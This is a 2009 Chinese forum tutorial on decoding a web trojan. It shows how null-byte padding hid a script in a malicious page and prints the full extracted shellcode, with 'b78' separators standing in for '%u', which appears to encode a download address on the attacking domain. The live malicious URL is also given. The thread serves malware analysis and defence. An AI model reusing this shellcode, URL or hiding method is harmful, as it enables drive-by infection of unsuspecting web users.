123   1  /  3  页   跳转

[教程] 解密中容易忽略网马类型

解密中容易忽略网马类型



引用:
在昨天的每日安全播报中,遇到一个可能在初学解密过程中,会容易忽略的网马类型。因这个例子很典型,我们将作为教程来进行讲解,下面就来详细讲解一下。

  恶意网址:http://cn.com.fengyunfz.com.cn/images/images/bf.htm,我们先来看一下用freshow工具,check链接后源代码截图。




大家看到上述截图后,可能会有一些疑惑,这个恶意网址源代码内容只有几个字符,这个几个字符应该也不会是什么加密形式吧,或这个链接地址失效等等的疑惑,但恰恰这里面是有玄机的。

用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
最后编辑networkedition 最后编辑于 2009-06-05 09:58:52
分享到:
gototop
 

回复: 解密中容易忽略网马类型

那么该如何进一步分析呢,在这里我们可以根据提供地址,将此网页文件下载下来(迅雷或网际快车等),我们直接来看下载后的文件源代码内容是什么,详见截图:

gototop
 

回复: 解密中容易忽略网马类型

上图为我们下载bf.htm后,使用记事本打开后显示的源代码内容,再来进一步分析,我们看到源文件内容还是很乱,且有很多空格,需要将此源文件处理一下。在这里使用freshow的NULs功能,将源文件中空格过滤掉。先将源文件内容全选复制,粘贴至freshow上操作区域。见截图:



过滤选项选择NULs后点击filter过滤空格
最后编辑networkedition 最后编辑于 2009-06-05 10:25:57
gototop
 

回复: 解密中容易忽略网马类型

过滤空格后还需将处理好的源代码,通过点击up按钮从下操作区,上翻至上操作区。



处理后代码就一目了然了,红色框中已标出,此源文件中暗含一个Script。
最后编辑networkedition 最后编辑于 2009-06-05 10:23:08
gototop
 

回复: 解密中容易忽略网马类型

点击filter将script过滤出来,在数据收集区选中,点击check获取源文件。我们看到实际sfbf.css和bf.htm一样,都需要下载后使用NULs功能处理,具体可参见处理bf.htm方法,在这里就不再讲解。我们直接来看已经处理好的sfbf.css源文件内容:


varsfcode="b789090b789090b789090b789090b789090b789090b789090b7816EBb78335Bb7866D2b7889B8b7866A7b780431b784053b786642b78FA81b780151b78F37Cb7805EBb78E5E8b78FFFFb7860FFb7888C2b788BA7b78E6F8b78D497b7805C3b7804A6b78383Fb7891A7b7819A7b789FE7b78E42Cb7838BBb78FE2Cb781CAFb781950b78994Bb789AA5b781EA7b78E97Cb785AA0b78BAE1b78CD6Eb78F3F9b78A8CDb784AFEb78A249b78A4A7b785C45b7826E7b78649Fb7852D2b78EF2Eb78C097b78F2A5b78324Fb78ADA6b784CA7b78C55Eb78E9A6b78DECFb78B2C9b78DBA7b78C6D2b78D8CBb783DF3b785FA1b78B9B7b78B9A7b785232b78BA19b78BCA7b7880CFb78BEE7b78D5A7b78AA58b78FF58b78EE7Cb789383b7890F7b789358b784D87b78AF63b78087Cb78C86Fb78CACFb782BE7b789846b7832F7b78D2F1b785FEFb784037b784137b78E2CDb78B7FEb78CD2Cb787E2Ab78D2A7b78D7A7b78432Cb78D90Fb78DAA7b78262Cb7835F1b78DD47b78DEA7b782CF9b78BE02b789F2Cb780A83b78E282b78E4A7b78FFCDb78EBCDb78E7CDb782D2Cb78EDA4b782C3Bb7883A0b7847E0b78EA61b786564b78C7D9b78FA4Fb78F1A6b7898A7b78999Ab789E91b787E80b78F562b786BA3b78FF61b78BECFb783C0Cb7838A0b78822Cb7815BFb78FE48b78FFA7b7868CFb780BA0b786AA8b780BC0b7804A2b7850C0b78EA23b788CC2b7894ACb783A03b785A68b7861F8b788757b7891ACb788302b783C16b7810A9b7846A8b78EDC0b7813A8b78EBA8b7811FEb78D1ABb78176Fb786AC7b7837D2b785A6Fb787EACb7879D0b784AA8b784857b782CA0b787373b7876FBb786425b78739Cb78DBFBb7809FEb78E69Bb78DB23b783AC2b7882F1b78D74Ab78ECCEb7808ECb782C94b78A5A9b78A254b7820EFb7866F9b7863F8b7862F9b7865F9b7864F9b78A025b78369Bb7838A8b7868FAb786C57b78BAA4b78686Cb783DAAb785FA8b784E57b788244b7841ACb781423b780298b7816F3b78A4ABb78A7ABb78A6ABb78A9ABb78A52Bb7810ACb78C0FBb78AE72b781F5Fb78AE57b785440b78AF57b783B57b780A81b78DE9Eb7870FCb7898ACb789486b785788b7868C2b78E3F0b7859A8b782456b784E57b787D6Ab7834A8b78079Ab786012b789FABb789DD7b78A1BAb78648Cb789510b7866A8b7851A8b783C25b786D8Cb784465b787F6Ab78D4A8b786CBDb786EA8b786A43b786F10b7871A9b78C8A8b7870A8b780B56b786757b78626Ab7825A8b7812FCb7813ACb782D88b782D57b7826BCb782C6Bb783B23b783A94b78DC23b78FE80b7881E5b780875b7887BBb78B67Db78CF61b780CE9b7802ACb78CD25b788880b78B8C8b788361b789D16b785892b7887DCb785969b7892AFb78D262b786243b789B91b78E0C9b781D49b7887EBb785DABb789D23b783120b7858F1b78CAF9b78E823b781594b78B1DCb78A3D0b78F75Db78D423b78A088b78975Db78EC61b780BE9b7862ABb78739Bb7817A7b7890B8b78DF7Eb786DA0b78AA63b7874ABb7844E8b788B59b78C4B7b78EC4Fb78ED23b78B78Cb78D375b78BA23b783CE3b78A4F6b7864ABb78BE23b78B823b78176Db78E4F6b78566Bb78423Eb783F57b78B59Ab78CE39b782191b7847D5b78FCD1b785E4Eb788F72b78F5D3b7846D1b78AA64b786FB6b7823CCb788558b78F3D3b782531b786D38b789F21b78CD12b789E59b78018Db7854E5b78C798b780128b784207b78D9A8b78DAA8b787468b787074b782f3ab78692fb786f6cb786576b787a66b782e6cb786c69b78766fb786665b786c7ab78632eb786d6fb78632eb782f6eb786d69b786761b787365b78692fb78616db786567b782f73b78736ab78632eb787373b780000";varsionfull=0x40000;


gototop
 

回复: 解密中容易忽略网马类型

上述代码为已处理好的sfbf.css源文件内容,接下来简单分析一下,我们看到这个源代码中有很多b78,类似这种形式:b78xxxxb78,开头和结尾都是b78,中间是4位数字或字母的组合。和shellcode特征很相像,shellcode是以%u来作为分隔的,ok,我们来将代码处理一下。将b78替换为%u,这个源代码就变成了一个标准shellcode。



上图为已经替换好源代码内容。
最后编辑networkedition 最后编辑于 2009-06-05 10:44:04
gototop
 

回复: 解密中容易忽略网马类型

上述方法实际在网马解密中,也是经常使用到的方法。接下来的解密大家都应该知道如何来解密吧,两次esc后解出网马地址。

gototop
 

回复:解密中容易忽略网马类型

请教一下楼主,为什么用freshow看不到网马的源代码?貌似只是对网马做了简单的变形,用空格拆分而矣。。。。。。。。。

我就是想问,网马利用了什么方法,把自己的源代码隐藏掉呢?简单的加空格变形?希望楼主解释一下,谢谢咯
最后编辑无敌vip 最后编辑于 2009-06-05 15:20:10
gototop
 

回复:解密中容易忽略网马类型

好高深啊
gototop
 

回复:解密中容易忽略网马类型

汗,用MDecoder能看到源代码了
估计是freshow的一个bug吧
gototop
 
123   1  /  3  页   跳转
页面顶部
Powered by Discuz!NT